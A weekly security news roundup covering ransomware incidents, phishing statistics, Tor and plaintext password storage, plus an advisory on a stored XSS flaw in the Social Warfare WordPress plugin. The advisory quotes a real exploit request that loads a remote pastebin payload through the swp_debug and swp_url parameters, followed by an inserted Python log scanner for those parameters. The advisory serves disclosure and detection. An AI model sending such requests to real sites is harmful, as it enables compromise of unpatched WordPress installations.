This Week in Security News: Radio Frequency Technology and Telecom Crimes

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how radio frequency technology is putting industrial organizations at risk. Also, understand the threat landscape of telecommunications and how to prepare for future threats.

Police Federation Breach

The Police Federation of England and Wales (PFEW) has reportedly confirmed that it has been dealing with a ransomware attack on its computer systems. The PFEW was able to respond quickly to an alert from its cyber-security on Saturday 9th March, with cyber experts rapidly reacting to isolate the malware and stop it from spreading to PFEW branches.

Vulnerability Assessments Versus Penetration Tests: A Common Misconception

X-Force Red is an autonomous team of veteran hackers within IBM Security that is hired to break into organizations and uncover risky vulnerabilities that criminal attackers may use for personal gain. Our team recently unveiled new statistics collected from its penetration testing engagements. One statistic that stood out, although not surprisingly, was that out of 1,176 phishing emails sent to employees within five organizations from October 2017 to November 2018, 198 people clicked on the malicious link inside the email and 196 people submitted valid credentials.

Security Of Enterprise Wireless Networks

Providing enterprise network security is becoming an increasingly complex undertaking, as the number of threats emanating from the Internet continues to grow. Hackers continue to find new ways to attack systems and steal data. Dealing with these threats is highly complex. While numerous reviews like this may indicate that virtual private networks can protect you against all threats, getting on top of enterprise network security is much more difficult.

Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

Grandson of legendary John Deere engineer defends right-to-repair and condemns Big Ag for “taxing customers”

Willie Cade’s grandfather Theo Cade was one of John Deere’s most storied engineers, with 158 patents to his name; he invented the manure spreader and traveled the country investigating stories of how farmers were using, fixing, modifying and upgrading their equipment; today, Willie Cade is the founder of the Electronics Reuse Conference, having spent a quarter-century repairing electronics, diverting e-waste from landfills and rehabilitating it for use by low-income schools and individuals.

Behind the Scenes of Onion Services

In this article, we discuss how the domain names of services in the Tor network are set and what security risks they may pose. We examine a study from Princeton University concerned with the habits of Tor users in order to determine the potential impacts of security risks.

Norsk Hydro’s Ransomware Headache

The latest edition of the ISMG Security Report discusses the recent ransomware attack on aluminum giant Norsk Hydro. Plus, confessions of a former LulzSec and Anonymous hacker, and the growing problem of cyber extortion.

Readout from Secretary Nielsen’s Trip to Texas

Secretary of Homeland Security Kirstjen M. Nielsen traveled to Austin, Texas, where she delivered remarks at the International Association of Chiefs of Police (IACP) Midyear meeting between heads of state police agencies, police chief associations, and midsize agencies.

Zero-Day Stored XSS in Social Warfare

Exploitation Level: Easy / Remote

DREAD Score: 7.2

Vulnerability: Stored XSS

Patched Version: 3.5.3

A zero-day vulnerability has just appeared in the WordPress plugin world, affecting over 70,000 sites using the Social Warfare plugin.

The plugin contains a stored XSS (cross-site scripting) vulnerability and has been removed from the plugin repository. Attacks can be conducted by any user visiting the site.

A patch has been released and users are advised to update to version 3.5.3 as soon as possible.

What Is It All About?

The vulnerable code is contained within some of the plugin's debugging features. These features aren't directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability.

A fully working PoC is available in the wild and we expect the number of exploit attempts to grow in the coming days.

Indicators of Compromise:

You can look for requests pointing to any PHP file under /wp-admin/ with the following parameters in your access logs:

  • swp_debug
  • swp_url

Exploits in the wild

We are seeing a lot of exploit attempts in the wild from more than a hundred different IPs.

202.254.236.49 - - [21/Mar/2019:16:52:14 -0400] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf HTTP/1.1" 403 2669 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
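The access-log check described under Indicators of Compromise can be scripted. The following is an added example, not part of the original advisory; it assumes Combined Log Format like the line above, and the sample lines, IP addresses and host name in it are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory lists as indicators of compromise.
IOC_PARAMS = {"swp_debug", "swp_url"}

# Combined Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IPs, placeholder host), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Mar/2019:16:52:14 -0400] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://paste.example.invalid/raw/abc HTTP/1.1" 403 2669 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Mar/2019:16:53:02 -0400] "GET /wp-admin/admin-ajax.php?swp%5Fdebug=load_options&swp_url=https%3A%2F%2Fpaste.example.invalid%2Fraw%2Fabc HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [21/Mar/2019:16:54:40 -0400] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 98 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [21/Mar/2019:16:55:11 -0400] "GET /blog/?swp_url=x HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

def find_swp_requests(lines):
    """Return one record per /wp-admin/*.php request carrying an IoC parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m["target"])
        path = url.path.lower()
        if not (path.startswith("/wp-admin/") and path.endswith(".php")):
            continue
        # parse_qs percent-decodes names and values, so swp%5Fdebug still matches.
        params = parse_qs(url.query, keep_blank_values=True)
        seen = sorted(IOC_PARAMS.intersection(params))
        if seen:
            hits.append({
                "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "path": url.path, "params": seen,
                "swp_url": params.get("swp_url", [""])[0],
            })
    return hits

if __name__ == "__main__":
    for hit in find_swp_requests(SAMPLE_LOG):
        print(hit)
```

The status field separates requests that were refused (403, as in the log line above) from those the server answered normally, which are the ones to review first.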

Facebook Password Security Fail

Facebook is facing scrutiny once again today after disclosing that it accidentally stored “hundreds of millions” of user passwords in plaintext. To make matters worse, 20,000 Facebook employees had access to view these passwords. Instagram users are also impacted by this massive oversight.